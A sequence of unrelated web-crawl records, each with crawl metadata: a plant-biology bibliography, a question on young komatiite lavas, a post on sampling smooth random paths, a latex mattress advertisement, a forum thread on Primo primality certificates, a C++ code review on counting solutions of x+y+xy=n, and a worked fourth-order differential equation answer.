Fletcher, J. C. ( 2002 ). Shoot and floral meristem maintenance in Arabidopsis. Annu. Rev. Plant Biol . 53 , 45 -66. Frenz, M., Pratisto, H., Könz, F., Jansen, E. D., Welch, A. J. and Weber,H. P. ( 1996 ). Comparison of the effects of absorption coefficient and pulse duration of 2.12-μm and 2.79-μm radiation on laser ablation of tissue. IEEE J. Quant. Elect. 32 , 2025 -2036. Gilbert, S. F. ( 2000 ). Developmental Biology , 6th edition. Sunderland, Massachusetts: Sinauer Associates. Green, P. B. ( 1992 ). Pattern formation in shoots: A likely role for minimal energy configurations of the tunica. Int. J. Plant Sci . 153 , S59 -S75. Green, P. B. ( 1996 ). Expression of form and pattern in plants – a role for biophysical fields. S emin. Cell Dev. Biol. 7 , 903 -911. Gross-Hardt, R. and Laux, T. ( 2003 ). Stem cell regulation in the shoot meristem. J. Cell Sci. 116 , 1659 -1666. Hantke, S. S., Carpenter, R. and Coen, E. S.( 1995 ). Expression of floricaula in single cell layers of periclinal chimeras activates downstream homeotic genes in all layers of floral meristems. Development 121 , 27 -35. Holden, C. and Vogel, G. ( 2002 ). Plasticity:Time for a reappraisal? Science 296 , 2126 -2129. Jackson, D., Veit, B. and Hake, S. ( 1994 ). Expression of maize KNOTTED1 related homeobox genes in the shoot apical meristem predicts patterns of morphogenesis in the vegetative shoot. Development 120 , 405 -413. Könz, F., Frenz, M., Romano, V., Forrer, M., Weber, H. P.,Kharkovskiy,A. V. and Khomenko, S. I. ( 1993 ). Active and passive Q-switching of 2.79 μm Er:Cr:YSGG laser. Optics Commun. 103 , 398 -404. Kuhlemeier, C. and Reinhardt, D. ( 2001 ). Auxin and phyllotaxis. Trends Pl. Sci. 6 , 187 -189. Loiseau, J.-E. ( 1959 ). Observation et expérimentation sur la phyllotaxie et le fonctionnement du sommet végétatif chez quelques balsaminacées. Ann. Sci. Nat. Bot. Ser . 11 , 1 -214. Long, J. A., Moan, E. I., Medford, J. I. and Barton, M. K.( 1996 ). A member of the KNOTTED class of homeodomain proteins encoded by the STM gene of Arabidopsis. Nature 379 , 66 -69. Long, J. and Barton, M. K. ( 2000 ). Initiation of axillary and floral meristems in Arabidopsis. Dev. Biol . 218 , 341 -353. Loreto, F., Mannozzi, M., Maris, C., Nascetti, P., Ferranti, F. andPasqualini, S. ( 2001 ). Ozone quenching properties of isoprene and its antioxidant role in leaves. Plant Phys. 126 , 993 -1000. Lyndon, R. F. ( 1998 ). The Shoot Apical Meristem – Its Growth and Development . Cambridge, UK: Cambridge University Press. Mayer, K. F. X., Schoof, H., Haecker, A., Lenhard, M.,Jürgens, G. andLaux, T. ( 1998 ). Role of WUSCHEL in regulating stem cell fate in the Arabidopsisshoot meristem. Cell 95 , 805 -815. Parnis, A., Cohen, O., Gutfinger, T., Hareven, D., Zamir, D. and Lifschitz,E. ( 1997 ). The dominant developmental mutants of tomato, mouse-ear and curl, are associated with distinct modes of abnormal transcriptional regulation of a KNOTTEDgene. Plant Cell 9 , 2143 -2158. Pien, S., Wyrzykowska, J., McQueen-Mason, S., Smart, C. and Fleming,A. ( 2001 ). Local expression of expansin induces the entire process of leaf development and modifies leaf shape. 98 , 11812 -11817. Pilkington, M. ( 1929 ). The regeneration of the stem apex. New Phytol. 28 , 37 -53. Reinhardt, D., Wittwer, F., Mandel, T. and Kuhlemeier, C.( 1998 ). Localized upregulation of a new expansin gene predicts the site of leaf formation in the tomato meristem. Plant Cell 10 , 1427 -1437. Reinhardt, D., Mandel, T. and Kuhlemeier, C.( 2000 ). Auxin regulates the initiation and radial position of plant lateral organs. Plant Cell 12 , 507 -518. Reinhardt, D. and Kuhlemeier, C. ( 2002 ). Phyllotaxis in higher plants. In Meristematic tissues in plant growth and development (ed. M. T. McManus and B. E. Veit), pp. 172 -212. Sheffield, UK: Sheffield Academic Press. Schoof, H., Lenhard, M., Haecker, A., Mayer, K. F. X.,Jürgens, G. andLaux, T. ( 2000 ). The stem cell population of Arabidopsis shoot meristems is maintained by a regulatory loop between the CLAVATA and WUSCHEL genes. Cell 100 , 635 -644. Simon, R. ( 2001 ). Function of plant shoot meristems. Semin. Cell Dev. Biol . 12 , 357 -362. Steeves, T. A. and Sussex, I. M. ( 1989 ). Patterns in Plant Development. New York: Cambridge University Press. Stewart, R. N. and Dermen, H. ( 1970 ). Determination of number and mitotic activity of shoot apical initial cells by analysis of mericlinal chimeras. Amer. J. Bot. 57 , 816 -826. Stieger, P. A., Reinhardt, D. and Kuhlemeier, C.( 2002 ). The auxin influx carrier is essential for correct leaf positioning. Plant J. 32 , 509 -517. Stuurman, J., Jäggi, F. and Kuhlemeier, C.( 2002 ). Shoot meristem maintenance is controlled by a GRAS-gene mediated signal from differentiating cells. Genes Dev. 16 , 2213 -2218. Sussex, I. M. ( 1964 ). The permanence of meristems: Developmental organizers or reactors to exogenous stimuli? Brookhaven Symp. Biol . 16 , 1 -12. Szymkowiak, E. J. and Sussex, I. M. ( 1992 ). The internal meristem layer (L3) determines floral meristem size and carpel number in tomato periclinal chimeras. Plant Cell 4 , 1089 -1100. Szymkowiak, E. J. and Sussex, I. M. ( 1993 ). Effect of lateral suppressor on petal initiation in tomato. Plant J. 4 , 1 -7. Szymkowiak, E. J. and Sussex, I. M. ( 1996 ). What chimeras can tell us about plant development. Annu. Rev. Plant Physiol. Plant Mol. Biol . 47 , 351 -376. Tilney-Basset, R. A. E. ( 1986 ). Plant Chimeras. London: Edward Arnold. van den Berg, C., Willemsen, V., Hage, W., Weisbeek, P. and Scheres, B. ( 1995 ). Cell fate in the Arabidopsisroot meristem determined by directional signalling. Nature 378 , 62 -65. van den Berg, C., Willemsen, V., Hendriks, G., Weisbeek, P. and Scheres,B. ( 1997 ). Short-range control of cell differentiation in the Arabidopsis root meristem. Nature 390 , 287 -289. Vernoux, T., Kronenberger, J., Grandjean, O., Laufs, P. and Traas, J. ( 2000 ). PIN-FORMED1 regulates cell fate at the periphery of the shoot apical meristem. Development 127 , 5157 -5165. Weigel, D. and Jürgens, G. ( 2002 ). Stem cells that make stems. Nature 415 , 751 -754. Weissman, I. L. ( 2000 ). Stem cells: Units of development, units of regeneration, and units in evolution. Cell 100 , 157 -168.
2022-10-07 22:17:05
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.48625409603118896, "perplexity": 6818.866906206778}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00578.warc.gz"}
https://earthscience.stackexchange.com/questions/4463/what-caused-the-high-temperatures-that-resulted-in-the-cretaceous-aged-komatiite
# What caused the high temperatures that resulted in the Cretaceous aged komatiite lavas of Gorgona Island, Colombia? According to the San Diego State University (SDSU) webpage Unusual Lava Types, komatiite is ultramafic volcanic rocks, having very low silica contents (~40-45%) and very high $\ce{MgO}$ contents (~18%). These lavas are exceptional not only for their compositions, but also for their very old, restricted ages. These lavas have no modern analogs. The vast majority of komatiite deposits, according to the SDSU webpage, are about 3 Ga or older in age, due to These ancient lava flows erupted at a time when the Earth's internal heat was much greater than today, thus generating exceptionally hot, fluid lavas with calculated eruption temperatures in excess of 1,600 degrees C (2,900 degrees F). However, with many things in Science, there are exceptions - according to the SDSU webpage, Gorgona Island, Colombia has komatiite deposits that are Cretaceous in age (around 90 Ma). The presence of young komatiite hints at higher temperatures at formation - something that has not been seen in any significant amount since the Archaean. What caused the high temperatures that resulted in the Cretaceous aged komatiite lavas of Gorgona Island, Colombia?
2022-01-22 11:20:30
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.556698739528656, "perplexity": 8623.56130257491}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303845.33/warc/CC-MAIN-20220122103819-20220122133819-00052.warc.gz"}
https://jack.valmadre.net/notes/2020/01/06/sample-smooth-paths/
Jupyter notebook here Sometimes it’s useful to generate random smooth paths that hang around the origin. The simplest way to obtain a random path is to generate a random walk where each step is independent and normally distributed. To make the path smooth, we have a couple of options: (1) we could smooth the path with a low-pass filter, or (2) we could integrate the random walk again such that the second derivative is normally distributed rather than the first derivative. However, one problem with these approaches is that the paths might stray arbitrarily far from the origin. Here’s a simple technique that I use to generate smooth paths that don’t stray too far. Let’s consider the problem of sampling a path of length $N$ in one dimension. We can always sample multiple independent paths to obtain a multi-dimensional path. The idea is simply to sample from a Gaussian distribution with precision matrix (inverse covariance matrix) where $\Lambda_1 = D_1^T D_1$ and $\Lambda_2 = D_2^T D_2$ and $D_{i}$ is a finite difference operator of order $i$. Then finite difference matrix $D_i$ has shape $(N - i) \times N$. To sample from the distribution $\mathcal{N}(0, \Lambda^{-1})$, we need a matrix $A$ such that $A A^{T} = \Lambda^{-1}$. This can be obtained by computing an eigendecomposition $\Lambda = V D V^T$ and setting $A = V D^{-\frac{1}{2}}$. To obtain a path, we then take $x = A \epsilon$ where $\epsilon$ is drawn from a unit normal distribution. Efficient technique However, the above approach requires us to compute a factorization of a large (admittedly sparse) matrix. This can be avoided if we are willing to instead consider sampling periodic smooth paths. If we assume the paths to be periodic, then the finite difference matrices will be square and circulant. Circulant matrices can be diagonalized using the Discrete Fourier Transform. For engineers like me, this diagonalization is hiding in the familiar convolution identity. Let $Y$ denote the matrix which corresponds to circular convolution with a signal $y$. Here the $F$ matrix computes the DFT in the same way as the function fft() in numpy. Note that this matrix is not unitary but instead satisfies For convenience, let us define $U = \frac{1}{\sqrt{N}} F$ so that $U^{-1} = U^{\ast}$ and the diagonalization can be expressed: Now we can use this to diagonalize the finite difference matrix: where $d_{1} = (-1, 1, 0, \dots, 0)$. The Gram matrix becomes Finally, the entire precision matrix $\Lambda$ can therefore be diagonalized $\Lambda = U^{\ast} \operatorname{diag}(\lambda) U$ where Note that $F \delta = 1$. Incidentally, since $d_2 = d_1 \star d_1$, we see that $F d_{2} = (F d_{1})^2$ and therefore $\lvert F d_{2} \rvert^2 = \lvert F d_{1} \rvert^4$. Therefore, to sample from the distribution $\mathcal{N}(0, \Lambda^{-1})$, it seems that we could use the matrix But wait, something seems wrong here. The precision matrix $\Lambda$ is symmetric positive-definite and yet the eigenvectors in $U$ are complex? In order to obtain samples $x = A \epsilon$, we need a real factorization $\Sigma = A A^{T}$. Real diagonalization What’s happened here is that some eigenvalues occur twice and therefore the eigenvectors are not unique: we can take any (complex) rotation of two eigenvectors with the same eigenvalue and they are still unit-norm eigenvectors of the same matrix. It should be possible to mix these eigenvectors in a way that makes them real. Recall that the Fourier transform of a real-valued signal has conjugate symmetry. We can immediately observe that the transform $\lambda$ possesses real symmetry since it is obtained from the magnitude of a transform with conjugate symmetry. Therefore the identical eigenvalues occur at $\lambda[k]$ and $\lambda[N - k]$. From the diagonalization $\Lambda = U^{\ast} \operatorname{diag}(\lambda) U$ we can see that the eigenvalues correspond to rows of $U$. Happily, the rows of $U$ possess conjugate symmetry. Recall from the definition of the DFT matrix $F$ (which is related to the unitary matrix $U$ by a scalar) that element $s, t$ of the DFT matrix is $F_{s, t} = \omega_{N}^{s t}$ where $\omega_{N} = \exp(i 2 \pi / N)$. Using the fact that $\omega_{N}^{n} = \omega_{N}^{n \bmod N}$ we see the symmetry in the rows of $F$: There are two special cases. For $s = 0$, we have $F_{s, t} = \omega_{N}^{0} = 1$, which is already real. For $s = N / 2$ (only when $N$ is even), we have $F_{s, t} = \omega_{N}^{(N/2) t} = (-1)^{t}$, which is also already real. Therefore we propose to introduce an orthonormal complex matrix $Q$ such that $V = Q U$ is real and therefore $V^{T} = V^{\ast} = V^{-1}$. Let $U_{k}$ denote row $k$ of the matrix $U$. Let $Q_{k}$ denote the submatrix of elements $\{k, N - k\} \times \{k, N - k\}$ of the matrix $Q$. If we let $Q_{k}$ take the form then we see that which is real. To preserve orthogonality, we choose $\alpha = \beta = \frac{1}{\sqrt{2}}$. This will have no effect on the eigenvalues since Overall our $Q$ matrix takes the form Finally, we have our real $A = U^{\ast} Q^{\ast} \operatorname{diag}(\lambda^{-\frac{1}{2}})$. Since $U^{\ast} = \frac{1}{\sqrt{N}} F^{\ast} = \sqrt{N} F^{-1}$, samples can be obtained Note that the operation $Q^{\ast}$ can be implemented as follows When $h$ is real and symmetric (as above), this is equivalent to Here are a few smaples from this distribution. I often use $\alpha = 0$ and $\beta \in [10^3, 10^6]$. Note that, since the paths are constrained to be periodic, shorter paths may be tightly clustered. Of course, if we want to generate non-periodic paths, we can generate a periodic path of a larger size and then truncate it.
2020-02-24 13:28:20
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9538252949714661, "perplexity": 172.62503125356838}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875145960.92/warc/CC-MAIN-20200224132646-20200224162646-00542.warc.gz"}
http://www.healthyfoundations.com/blog/?p=1204
# A Natural Latex Mattress is Completely Recyclable Are you thinking about a natural latex mattress and all the benefits it can provide? A 100% all-natural latex mattress is hypoallergenic, antimicrobial, and dust mite-free. It is also extremely comfortable. If those are not enough great reasons to think about an all-natural latex mattress, here is one more… Since an all-natural latex mattress is completely botanical and made from the sap of a rubber tree, it is completely recyclable. That is another great benefit of a natural latex mattress. A natural latex mattress has a lot of great benefits, but it is important to understand that a lot of latex that is being labeled as “natural” is actually man-made or synthetic latex.  Many companies call their mattress a natural latex mattress when it is actually has just a small amount of natural latex and the rest of the latex is synthetic or man-made.  This distinction is often purposely vague and unclear.  If you really want to make sure the natural latex mattress you are interested in is all natural, ask if there is any synthetic latex in it. If you want the unique qualities and comfort of a natural latex mattress, remember that it also has the unique ability to be completely recycled and is a great green alternative to other mattresses.
2021-12-01 18:37:23
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9068459868431091, "perplexity": 1794.2502352419713}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964360881.12/warc/CC-MAIN-20211201173718-20211201203718-00085.warc.gz"}
https://mersenneforum.org/showthread.php?s=ea96a77cec8e393157efa64f1a37009d&p=598464
mersenneforum.org Primo Register FAQ Search Today's Posts Mark Forums Read 2022-01-02, 01:39 #166 Jayder     Dec 2012 1000101112 Posts Is anybody currently working on the PRPs <= 3000? I may do a little or a lot of work, and I don't want to run into anyone. 2022-01-02, 18:01 #167 chris2be8     Sep 2009 2·33·43 Posts I'm working on them from the bottom up. If you keep away from the lowest few hundred PRPs you should be OK (anything over 1500 digits should be safe for at least a month). 2022-01-20, 19:30 #168 kruoli     "Oliver" Sep 2017 Porta Westfalica, DE 2×487 Posts Currently, I am running a certification on Sm(2445)*10^8677+Smr(2446). While the system I am running it on has a throughput of slightly above one 10k digit number per day, it now stands at 46806/57633 bits in phase 1 after more than a week (slightly above eight days). This is with the same number of threads as with the 10k candidates. Even if I assume that Primo operates in $$\mathcal{O}(\log(n)^{5+\varepsilon})$$ for small $$\varepsilon$$ instead of $$\mathcal{O}(\log(n)^{4+\varepsilon})$$, this seems way slower than it should be expected. Is my expectation flawed (maybe I computed the ETA wrong) or is there something else that could slow it done? I know that ECPP is non-deterministic algorithm and I might got an extreme sample here. Can somebody chime in if this might be the case? 2022-01-20, 19:39   #169 paulunderwood Sep 2002 Database er0rr 23·179 Posts Quote: Originally Posted by kruoli Currently, I am running a certification on Sm(2445)*10^8677+Smr(2446). While the system I am running it on has a throughput of slightly above one 10k digit number per day, it now stands at 46806/57633 bits in phase 1 after more than a week (slightly above eight days). This is with the same number of threads as with the 10k candidates. Even if I assume that Primo operates in $$\mathcal{O}(\log(n)^{5+\varepsilon})$$ for small $$\varepsilon$$ instead of $$\mathcal{O}(\log(n)^{4+\varepsilon})$$, this seems way slower than it should be expected. Is my expectation flawed (maybe I computed the ETA wrong) or is there something else that could slow it done? I know that ECPP is non-deterministic algorithm and I might got an extreme sample here. Can somebody chime in if this might be the case? I found log^4 is a good rule of thumb. Have you selected max settings on the certification page? 11k dd? (?). Things will speed up! I know it can be disheartening to watch it backtrack, A watched kettle never boils! 2022-01-20, 19:41 #170 kruoli     "Oliver" Sep 2017 Porta Westfalica, DE 97410 Posts Yes, I used 11k digits and the maximum setting in the other field. Watching it is only fun when it has sped up considerably towards the end of phase 1. 2022-01-21, 05:38   #171 Batalov "Serge" Mar 2008 Phi(4,2^7658614+1)/2 7·23·61 Posts Quote: Originally Posted by kruoli Watching it is only fun when... ... you pressed the button "Start". You job was already done then. Unless you also watch the paint dry. (assuming you ever painted walls) 2022-02-17, 16:39 #172 chris2be8     Sep 2009 2·33·43 Posts @Ray Chandler, would you mind moving to slightly larger numbers? My script has reached 1519 digits and I've seen it try to process some numbers you had just submitted certificates for. It would avoid the bad case of us both generating certificates for the same number at the same time. 2022-02-19, 03:25   #174 EdH "Ed Hall" Dec 2009 119616 Posts Quote: Did you unpack them first? Did they look like: Code: [PRIMO - Primality Certificate] Version=4.3.0 - LX64 WebSite=http://www.ellipsa.eu/ Format=4 ID=B3F5C051930D8 Created=Feb-26-2019 11:45:39 PM TestCount=321 Status=Candidate certified prime Put here any comment... [Running Times (Wall-Clock)] 1stPhase=6709s 2ndPhase=1902s Total=8611s [Running Times (Processes)] 1stPhase=24918s 2ndPhase=7447s Total=32365s [Candidate] . . . 2022-02-19, 03:40   #175 sweety439 "99(4^34019)99 palind" Nov 2016 (P^81993)SZ base 36 3,373 Posts Quote: Originally Posted by EdH Did you unpack them first? Did they look like: Code: [PRIMO - Primality Certificate] Version=4.3.0 - LX64 WebSite=http://www.ellipsa.eu/ Format=4 ID=B3F5C051930D8 Created=Feb-26-2019 11:45:39 PM TestCount=321 Status=Candidate certified prime [Comments] Put here any comment... [Running Times (Wall-Clock)] 1stPhase=6709s 2ndPhase=1902s Total=8611s [Running Times (Processes)] 1stPhase=24918s 2ndPhase=7447s Total=32365s [Candidate] . . . I unpack the .gz files, and find a folder containing a .certif file, I change the ".certif" to ".zip" and uploaded them to factordb 2022-02-19, 04:20   #176 paulunderwood Sep 2002 Database er0rr 23×179 Posts Quote: Originally Posted by sweety439 I unpack the .gz files, and find a folder containing a .certif file, I change the ".certif" to ".zip" and uploaded them to factordb gunzip the .gz files. Then zip the .certif up to .zip. No need to rename anything Last fiddled with by paulunderwood on 2022-02-19 at 04:25 Similar Threads Thread Thread Starter Forum Replies Last Post PawnProver44 Information & Answers 14 2016-04-09 05:49 WraithX Software 15 2013-09-10 07:24 wblipp FactorDB 1 2012-05-28 03:16 Cybertronic Five or Bust - The Dual Sierpinski Problem 17 2009-08-13 20:42 fivemack Math 35 2009-04-28 15:03 All times are UTC. The time now is 19:29. Mon May 16 19:29:53 UTC 2022 up 32 days, 17:31, 1 user, load averages: 1.67, 1.45, 1.38
2022-05-16 19:29:53
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2731076180934906, "perplexity": 7097.1914455765955}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662512229.26/warc/CC-MAIN-20220516172745-20220516202745-00327.warc.gz"}
https://codereview.stackexchange.com/questions/83464/counting-the-positive-integer-solutions-of-an-equation
# Counting the positive integer solutions of an equation I have to solve this equation: $x + y + xy = n$ #include <iostream> #include <cstring> using namespace std; long c; int main() { long x = 0; cin >> c; if(c == 0) { cout << 1 << endl; return 0; } for(long i = 1; i <= c / 2; i ++) { for(long j = 1; j <= c; j ++) if(i + j + i * j == c) { x ++; break; } } cout << x + 2 << endl; } Of course this code is very slow. How can I find a positive number of solutions in a faster way? Maybe there is a specific algorithm? • How do you expect to "solve" that equation? It has an infinite number of solutions, which of the solutions do you want to return? Mar 7 '15 at 12:34 (Remark: The question mentions "positive number of solutions", but from your code I assume that you meant "number of non-negative integer solutions".) Coding style: • #include <cstring> is not needed here. • Don't use namespace std;, see for example Why is “using namespace std;” considered bad practice?. • long c; is only used in main(), so there is no need at all to declare it as a global variable. • Always use braces { ... } for the body of for- and if-statements, even if it has only one statement. It helps to avoid errors if additional statements are added later. • Move the computation of the number of solutions to a separate function. This keeps the main function small and is convenient if you add test cases. • I prefer a different spacing in for- and if-statements, but that may be a matter of taste. • Variable names: If the equation is given as $x + y + xy = n$, then why not use the same names in your program? And x is a quite non-descriptive name of a number of solutions. • It may not be immediately obvious why 2 is added to the number of solutions, so an explaining comment would be appropriate here. Then your code would look like this: #include <iostream> // Number of non-negative integer solutions to // x + y + x * y == n . long numberOfSolutions(long n) { if (n == 0) { return 1; } // Count all positive solutions: long count = 0; for (long x = 1; x <= n / 2; x++) { for (long y = 1; y <= n; y++) { if (x + y + x * y == n) { count++; break; } } } // Add 2 for the solutions x=0,y=n and x=0,y=n: return count + 2; } int main() { long n; std::cin >> n; std::cout << numberOfSolutions(n) << std::endl; } Performance: Your code tries all possible combinations of x, y to find solutions and therefore runs in $O(n^2)$. A small improvement could be to use the symmetry of the problem, i.e. enumerate only pairs with x <= y: for (long x = 1; x <= n / 2; x++) { for (long y = x; y <= n; y++) { if (x + y + x * y == n) { // Counts a 2 solutions if x != y: count = count + 1 + (x != y); break; } } } This cuts the total number of iterations down by a factor of 2, but it is still $O(n^2)$. Better algorithm: If you write your equation as $$n + 1 = x + y + xy + 1 = (x + 1)(y + 1)$$ then it becomes obvious that it can be solved by determining the number of divisors of $n+1$. This known as the Divisor function and can be computed efficiently. Even the simplest implementation long numberOfDivisors(long n) { long count = 0; for (long j = 1; j <= n; j++) { if (n % j == 0) { count++; } } return count; } runs in $O(n)$ instead of $O(n^2)$. More sophisticated methods use the prime factorization of $n$ .
2022-01-29 14:44:48
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.44907549023628235, "perplexity": 934.2402159630012}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320306181.43/warc/CC-MAIN-20220129122405-20220129152405-00426.warc.gz"}
http://mathcentral.uregina.ca/QQ/database/QQ.09.12/h/andreea1.html
SEARCH HOME Math Central Quandaries & Queries Hei. I don’t speak lot of english but here is my question,hope u understand: f(x) + f ''''(x)=0. so, my question. what is f(x), where f ''''(x) is f(x) derivative by four time ? i tried to find the answer and i knew f(x) is something like that f(x)=e^x*sinx but miss something. i don`t know. Hello Andrea, To solve this problem we need to have an understanding of solving High Order Homogeneous Linear Differential Equations, and specifically when we have complex roots. If we re-write the questions $f(x) + f ’’’’(x) = 0$ into the form $y^{(4)} +y =0,$ we can see that this is a Fourth Order Linear Differential Equation. Therefore, we can assume that the solutions will be of the form $y(x) = e^{rx}.$ To find the value(s) of r we must set up the characteristic equation for this differential equation, which is  $r^4 + 1=0,$ with $r = (-1)^{1/4.}$ To finish solving the problem we need to be able to evaluate the four roots of -1. METHOD 1 To do this we must recall how to solve characteristic equations of the form $r^n – a = 0.$ To do this we use the fact that a in polar form is $a = R(e^{i \alpha}),$ where $R = |a|,$ and where $\alpha = 0$ when $a > 0,$ and $\alpha = \pi$ when $a < 0.$ From Euler’s formula $e^{i \theta} = \cos \theta + i \sin \theta,$ we can conclude that $e^{i2k \pi}= 1$, with $k = 0, 1, 2, 3, …$ From that we can conclude that $a = R(e^{i(\alpha+2k \pi)})$ and  $a^{1/n} = R^{1/n}(e^{i(\alpha+2k \pi)/n}),$ with $k = 0, 1, 2 ,3,…, n – 1$ Applying this formula to our situation we have $r^4 – (– 1) = 0,$ so $a = – 1, R = 1,$ and $\alpha = \pi$  since $a < 0.$ Using the formula    $a^{1/n} = R(e^{i(\alpha+2k \pi)/n}),$ with $n = 4,$ we use this and Euler’s formula to find the four roots. $(k = 0, 1, 2, 3).$ METHOD 2 If we solve the quartic equation $r^4 + 1= 0,$ we end up getting 4 different imaginary roots. These roots are $\pm \sqrt i$  and  $\pm i \sqrt i.$ In order to simplify this and use our complex roots general solution for differential equations, we need to be able to evaluate $\sqrt i$. To do this we can use Euler’s formula $e^{i \theta} = \cos \theta + i \sin \theta$ Plugging in $\theta = \frac{\pi}{2}$. we get that $e^{i \frac{\pi}{2}} = i,$ that means that $\sqrt i = i^{1/2} = \left( e^{i \frac{\pi}{2}} \right)^{\frac12} = e^{i \frac{\pi}{4}}$. Evaluating this back into Euler’s formula we get that $\sqrt i = e^{i \frac{\pi}{4}} = \cos\left( \frac{\pi}{4}\right) + i \sin\left( \frac{\pi}{4}\right),$ which gives us the result that$\sqrt i = \frac{1+i}{\sqrt 2}.$ Using this fact we can determine the complex value of the other three roots. Once we have our four roots we can write our general solution to the Homogeneous problem. Since there will be four roots, there will be 4 different terms in our solution. Hope this helps. Brennan Yaremko Math Central is supported by the University of Regina and The Pacific Institute for the Mathematical Sciences.
2018-12-17 00:38:38
